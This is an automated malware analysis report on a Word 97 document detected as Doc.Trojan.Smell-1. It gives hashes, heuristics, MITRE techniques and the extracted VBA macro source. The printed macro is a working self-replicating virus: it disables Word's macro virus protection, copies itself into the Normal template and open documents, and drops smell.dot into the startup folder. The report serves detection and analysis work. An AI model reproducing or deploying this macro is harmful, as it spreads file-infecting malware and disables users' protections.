Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c4718b025b074b4…

MALICIOUS

Office (OLE)

36.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c65bbb8261cc8ece77cd4b3471f9df82 SHA-1: 6991fcd177ca4cbd8601f908a27aaee07cf98c4e SHA-256: 9c4718b025b074b401cb8207ec16333ca69376d1479af0d1195fd55c731d782a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The macro attempts to install itself into the Normal template and the active document, suggesting a downloader or dropper functionality. The presence of 'smell.dot' and references to 'smell' within the code indicate a specific, albeit unknown, malware component.

Heuristics 3

  • ClamAV: Doc.Trojan.Smell-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Smell-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3271 bytes
SHA-256: c3b438c7092de927c03be36e8df4a004d9f9b235dc8f8c2604df120546837425
Detection
ClamAV: Doc.Trojan.Smell-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public WhoAmI As String
Public SmellDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public DocThere As Boolean

Private Sub Document_Open()
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCode
If WhoAmI = "normal" Then Call NormCode
If WhoAmI = "smell" Then Call SmellCode
End Sub

Function ID_Status()
On Error Resume Next

If MacroContainer = NormalTemplate Then
    WhoAmI = "normal"
    GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "smell.dot" Then WhoAmI = "smell"
checkout:
End Function

Function Install_Status()
On Error Resume Next
If Dir(Application.StartupPath + "\smell.dot") = "smell.dot" Then SmellDot = True
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Smell" Then DocInstalled = True
    Next i
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "Smell" Then NormInstalled = True
    Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function

Function DocCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False Then
    ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
    FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function NormCode()
On Error Resume Next
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
   ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
   ActiveDocument.Save
End If
If SmellDot = False And DocThere = True Then
   ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
   FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function Check_For_Doc()
On Error GoTo docek
If ActiveDocument.Name <> "" Then
    DocThere = True
End If
GoTo over
docek:
DocThere = False
over:
End Function

Function SmellCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    NormalTemplate.Save
End If
If DocInstalled = False Then
    ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    ActiveDocument.Save
End If
End Function